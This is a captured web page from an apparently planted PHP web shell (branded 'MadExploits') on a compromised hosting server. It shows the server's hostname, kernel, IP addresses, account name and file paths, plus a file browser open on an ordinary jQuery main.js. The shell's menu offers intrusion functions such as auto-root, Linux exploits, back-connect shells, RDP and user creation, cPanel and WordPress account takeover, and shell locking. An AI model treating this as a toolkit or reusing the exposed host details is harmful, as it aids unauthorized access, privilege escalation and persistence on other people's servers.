Linux dpw.dpwebtech.com 3.10.0-1160.88.1.el7.x86_64 #1 SMP Tue Mar 7 15:41:52 UTC 2023 x86_64
Apache
: 192.232.243.69 | : 18.221.161.43
54 Domain
7.3.33
dpclient
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
dpclient /
public_html /
files /
js /
[ HOME SHELL ]
Name
Size
Permission
Action
bootstrap.js
67.34
KB
-rw-r--r--
bootstrap.min.js
36
KB
-rw-r--r--
html5shiv.js
2.32
KB
-rw-r--r--
jquery.isotope.min.js
15.66
KB
-rw-r--r--
jquery.js
93.54
KB
-rw-r--r--
jquery.prettyPhoto.js
21.54
KB
-rw-r--r--
main.js
1.2
KB
-rw-r--r--
modernizr.custom.js
8.79
KB
-rw-r--r--
respond.min.js
3.94
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : main.js
jQuery(function($) { $(function(){ $('#main-slider.carousel').carousel({ interval: 10000, pause: false }); }); //Ajax contact var form = $('.contact-form'); form.submit(function () { $this = $(this); $.post($(this).attr('action'), function(data) { $this.prev().text(data.message).fadeIn().delay(3000).fadeOut(); },'json'); return false; }); //smooth scroll $('.navbar-nav > li').click(function(event) { event.preventDefault(); var target = $(this).find('>a').prop('hash'); $('html, body').animate({ scrollTop: $(target).offset().top }, 500); }); //scrollspy $('[data-spy="scroll"]').each(function () { var $spy = $(this).scrollspy('refresh') }) //PrettyPhoto $("a.preview").prettyPhoto({ social_tools: false }); //Isotope $(window).load(function(){ $portfolio = $('.portfolio-items'); $portfolio.isotope({ itemSelector : 'li', layoutMode : 'fitRows' }); $portfolio_selectors = $('.portfolio-filter >li>a'); $portfolio_selectors.on('click', function(){ $portfolio_selectors.removeClass('active'); $(this).addClass('active'); var selector = $(this).attr('data-filter'); $portfolio.isotope({ filter: selector }); return false; }); }); });
Close